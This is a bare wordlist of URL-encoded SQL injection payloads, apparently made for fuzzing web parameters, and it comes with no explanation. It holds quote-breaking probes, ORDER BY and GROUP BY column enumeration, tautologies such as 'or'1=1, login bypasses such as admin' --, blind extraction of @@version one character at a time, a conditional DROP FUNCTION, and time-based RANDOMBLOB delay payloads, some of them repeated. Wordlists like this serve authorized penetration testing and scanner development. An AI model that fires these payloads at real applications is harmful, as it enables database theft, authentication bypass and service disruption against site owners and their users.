%27
%27%27
%60
%60%60
%2C
%22
%22%22
%2F
%2F%2F
%5C
%5C%5C
%3B
%27%3D%27
%27LIKE%27
%27%3D0--%2B
0%25
%40variable
%40%40variable
AND%201
AND%200
AND%20true
AND%20false
1-false
1-true
1*56
-2
1%27%20ORDER%20BY%201--%2B
1%27%20ORDER%20BY%202--%2B
1%27%20ORDER%20BY%203--%2B
1%27%20ORDER%20BY%201%2C2--%2B
1%27%20ORDER%20BY%201%2C2%2C3--%2B
1%27%20GROUP%20BY%201%2C2%2C--%2B
1%27%20GROUP%20BY%201%2C2%2C3--%2B
%27%20GROUP%20BY%20columnnames%20having%201%3D1%20--
OR%201%3D0
OR%20x%3Dx
OR%20x%3Dy
OR%201%3D0%23
OR%20x%3Dx%23
OR%20x%3Dy%23
OR%201%3D0--
OR%20x%3Dx--
OR%20x%3Dy--
HAVING%201%3D1
HAVING%201%3D0
HAVING%201%3D1%23
HAVING%201%3D0%23
HAVING%201%3D1--
HAVING%201%3D0--
AND%201%3D0
AND%201%3D0--
AND%201%3D0%23
ORDER%20BY%201--
ORDER%20BY%202--
ORDER%20BY%203--
ORDER%20BY%204--
ORDER%20BY%205--
ORDER%20BY%206--
ORDER%20BY%207--
ORDER%20BY%208--
ORDER%20BY%209--
ORDER%20BY%2010--
ORDER%20BY%2011--
ORDER%20BY%2012--
ORDER%20BY%2013--
ORDER%20BY%2014--
ORDER%20BY%2015--
ORDER%20BY%2016--
ORDER%20BY%2017--
ORDER%20BY%2018--
ORDER%20BY%2019--
ORDER%20BY%2020--
ORDER%20BY%2021--
ORDER%20BY%2022--
ORDER%20BY%2023--
ORDER%20BY%2024--
ORDER%20BY%2025--
ORDER%20BY%2026--
ORDER%20BY%2027--
ORDER%20BY%2028--
ORDER%20BY%2029--
ORDER%20BY%2030--
ORDER%20BY%2031337--
ORDER%20BY%201%23
ORDER%20BY%202%23
ORDER%20BY%203%23
ORDER%20BY%204%23
ORDER%20BY%205%23
ORDER%20BY%206%23
ORDER%20BY%207%23
ORDER%20BY%208%23
ORDER%20BY%209%23
ORDER%20BY%2010%23
ORDER%20BY%2011%23
ORDER%20BY%2012%23
ORDER%20BY%2013%23
ORDER%20BY%2014%23
ORDER%20BY%2015%23
ORDER%20BY%2016%23
ORDER%20BY%2017%23
ORDER%20BY%2018%23
ORDER%20BY%2019%23
ORDER%20BY%2020%23
ORDER%20BY%2021%23
ORDER%20BY%2022%23
ORDER%20BY%2023%23
ORDER%20BY%2024%23
ORDER%20BY%2025%23
ORDER%20BY%2026%23
ORDER%20BY%2027%23
ORDER%20BY%2028%23
ORDER%20BY%2029%23
ORDER%20BY%2030%23
ORDER%20BY%2031337%23
ORDER%20BY%201
ORDER%20BY%202
ORDER%20BY%203
ORDER%20BY%204
ORDER%20BY%205
ORDER%20BY%206
ORDER%20BY%207
ORDER%20BY%208
ORDER%20BY%209
ORDER%20BY%2010
ORDER%20BY%2011
ORDER%20BY%2012
ORDER%20BY%2013
ORDER%20BY%2014
ORDER%20BY%2015
ORDER%20BY%2016
ORDER%20BY%2017
ORDER%20BY%2018
ORDER%20BY%2019
ORDER%20BY%2020
ORDER%20BY%2021
ORDER%20BY%2022
ORDER%20BY%2023
ORDER%20BY%2024
ORDER%20BY%2025
ORDER%20BY%2026
ORDER%20BY%2027
ORDER%20BY%2028
ORDER%20BY%2029
ORDER%20BY%2030
ORDER%20BY%2031337
IF%287423%3D7424%29%20SELECT%207423%20ELSE%20DROP%20FUNCTION%20xcjl--
IF%287423%3D7423%29%20SELECT%207423%20ELSE%20DROP%20FUNCTION%20xcjl--
and%20%28select%20substring%28%40%40version%2C1%2C1%29%29%3D%27X%27
and%20%28select%20substring%28%40%40version%2C1%2C1%29%29%3D%27M%27
and%20%28select%20substring%28%40%40version%2C2%2C1%29%29%3D%27i%27
and%20%28select%20substring%28%40%40version%2C2%2C1%29%29%3D%27y%27
and%20%28select%20substring%28%40%40version%2C3%2C1%29%29%3D%27c%27
and%20%28select%20substring%28%40%40version%2C3%2C1%29%29%3D%27S%27
and%20%28select%20substring%28%40%40version%2C3%2C1%29%29%3D%27X%27
%27%5C%22
RANDOMBLOB%28500000000%2F2%29
AND%202947%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%28500000000%2F2%29%29%29%29
OR%202947%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%28500000000%2F2%29%29%29%29
RANDOMBLOB%281000000000%2F2%29
AND%202947%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%281000000000%2F2%29%29%29%29
OR%202947%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%281000000000%2F2%29%29%29%29
%27-%27
%27%20%27
%27%26%27
%27%5E%27
%27*%27
%22-%22
%22%20%22
%22%26%22
%22%5E%22
%22*%22
or%20true--
admin%27%20--
admin%27%20%23
admin%27%2F*
admin%22%20--
admin%22%20%23
admin%22%2F*
%3D%3D
%3D
%27
%27%20--
%27%20%23
%27%20%EF%BF%BD
%27--
%27%2F*
%27%23
%22%20--
%22%20%23
%22%2F*
or%20true
%27%20group%20by%20password%20having%201%3D1--
%27%20group%20by%20userid%20having%201%3D1--
%27%20group%20by%20username%20having%201%3D1--
like%20%27%25%27
or%200%3D0%20--
or%200%3D0%20%23
or%200%3D0%20%EF%BF%BD
%27or%271%3D1
%27or%271%3D1%3F
%27%3D%22or%27
%27%5C%22
RANDOMBLOB%28500000000%2F2%29
AND%202947%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%28500000000%2F2%29%29%29%29
OR%202947%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%28500000000%2F2%29%29%29%29
RANDOMBLOB%281000000000%2F2%29
AND%202947%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%281000000000%2F2%29%29%29%29
OR%202947%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%281000000000%2F2%29%29%29%29